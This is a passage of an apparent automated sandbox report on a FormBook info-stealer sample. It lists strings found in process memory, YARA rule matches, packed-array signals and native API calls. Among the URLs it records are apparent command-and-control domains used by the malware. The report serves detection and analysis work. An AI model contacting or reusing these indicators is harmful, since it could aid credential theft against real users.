Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.whatsapp1.autos
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.whatsapp1.autos/gy14/
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.whatsapp1.autos/gy14/www.venitro.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.whatsapp1.autosReferer:
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zezfhys.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zezfhys.com/gy14/
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zezfhys.com/gy14/www.batuoe.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zezfhys.comReferer:
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000006.00000003.3106112288.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1678060196.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000006.00000000.1667913063.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4101465452.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000006.00000000.1667913063.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4101465452.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000006.00000002.4106973998.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1678060196.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000006.00000003.3107844598.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1672845472.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4103472130.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3429507996.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000006.00000003.3107844598.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1672845472.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4103472130.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3429507996.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000006.00000002.4100238651.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1662873217.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1665061455.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4099296123.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000006.00000002.4103472130.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107844598.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1672845472.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3429507996.0000000009702000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000006.00000003.3107844598.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1672845472.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4103472130.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3429507996.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000006.00000002.4103472130.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107844598.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1672845472.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3429507996.0000000009702000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000006.00000002.4101465452.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000006.00000002.4101465452.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000006.00000002.4106973998.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1678060196.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000006.00000002.4101465452.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000006.00000002.4111127345.000000001170F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4100435255.000000000584F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
Source: explorer.exe, 00000006.00000002.4106973998.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1678060196.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000006.00000002.4106973998.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1678060196.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000006.00000000.1678060196.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4106973998.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000006.00000002.4106973998.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1678060196.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000006.00000002.4101465452.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000006.00000000.1667913063.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000006.00000002.4111127345.000000001170F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4100435255.000000000584F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=tulisanemas.com
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: control.exe, 00000008.00000002.4100435255.000000000584F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: z2______________________________.exe PID: 7496, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7708, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: control.exe PID: 7956, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

.NET source code contains very large array initializations

Source: 0.2.z2______________________________.exe.26f3450.11.raw.unpack, Architectural.cs	Large array initialization: : array initializer size 17982
Source: 0.2.z2______________________________.exe.2842900.3.raw.unpack, Architectural.cs	Large array initialization: : array initializer size 17982
Source: 0.2.z2______________________________.exe.291dea0.4.raw.unpack, Architectural.cs	Large array initialization: : array initializer size 17982
Source: 0.2.z2______________________________.exe.26d4fbc.12.raw.unpack, Architectural.cs	Large array initialization: : array initializer size 17982

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041A350 NtCreateFile,	5_2_0041A350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041A400 NtReadFile,	5_2_0041A400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041A480 NtClose,	5_2_0041A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041A530 NtAllocateVirtualMemory,	5_2_0041A530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041A47C NtClose,	5_2_0041A47C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041A52C NtAllocateVirtualMemory,	5_2_0041A52C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_019D2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2B60 NtClose,LdrInitializeThunk,	5_2_019D2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2AD0 NtReadFile,LdrInitializeThunk,	5_2_019D2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2DD0 NtDelayExecution,LdrInitializeThunk,	5_2_019D2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_019D2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_019D2D10
